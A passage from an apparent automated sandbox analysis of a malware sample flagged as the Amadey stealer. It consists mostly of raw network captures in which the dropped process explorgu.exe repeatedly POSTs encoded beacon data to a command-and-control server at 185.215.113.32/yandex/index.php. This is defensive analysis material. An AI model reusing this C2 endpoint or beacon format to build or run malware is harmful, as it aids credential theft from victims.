                                                                                            Mar 28, 2024 20:04:21.321912050 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:21.565356016 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:21 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            101192.168.2.449841185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:21.934012890 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:22.180349112 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:04:22.183352947 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:22.436834097 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            102192.168.2.449842185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:22.796981096 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:23.044841051 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:22 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            103192.168.2.449844185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:23.422112942 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:23.668888092 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:23 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            104192.168.2.449845185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:23.918071985 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:24.167860031 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            105192.168.2.449846185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:24.525120974 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:24.764106035 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:24 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            106192.168.2.449847185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:25.028331995 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:25.280544043 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            107192.168.2.449848185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:25.643217087 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:25.889813900 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:25 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            108192.168.2.449849185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:26.141411066 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:26.392553091 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            109192.168.2.449850185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:26.768306971 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:27.015290976 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:26 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            110192.168.2.449851185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:27.701234102 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:27.950536966 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:27 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            111192.168.2.449852185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:29.990067959 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:30.229198933 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            112192.168.2.449853185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:30.496388912 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:30.744712114 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:30 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            113192.168.2.449854185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:31.108074903 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:31.353399992 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            114192.168.2.449855185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:31.595195055 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:31.837445021 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:31 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            115192.168.2.449856185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:32.208204031 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:32.455002069 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            116192.168.2.449857185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:32.712693930 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:32.962754011 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:32 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            117192.168.2.449858185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:33.319751024 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:04:33.559474945 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            118192.168.2.449859185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:04:33.808773994 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:04:34.050784111 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:04:33 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Statistics

                                                                                            CPU Usage

                                                                                            Click to jump to process

                                                                                            Memory Usage

                                                                                            Click to jump to process

                                                                                            High Level Behavior Distribution

                                                                                            Click to dive into process behavior distribution

                                                                                            Behavior

                                                                                            Click to jump to process

                                                                                            System Behavior

                                                                                            General

                                                                                            Target ID:0
                                                                                            Start time:20:02:28
                                                                                            Start date:28/03/2024
                                                                                            Path:C:\Users\user\Desktop\wIaKimJFke.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\wIaKimJFke.exe"
                                                                                            Imagebase:0x4e0000
                                                                                            File size:1'906'688 bytes
                                                                                            MD5 hash:79FBD35CAE4148D9053CD4590B6D41C0
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.1627718624.0000000004CC0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
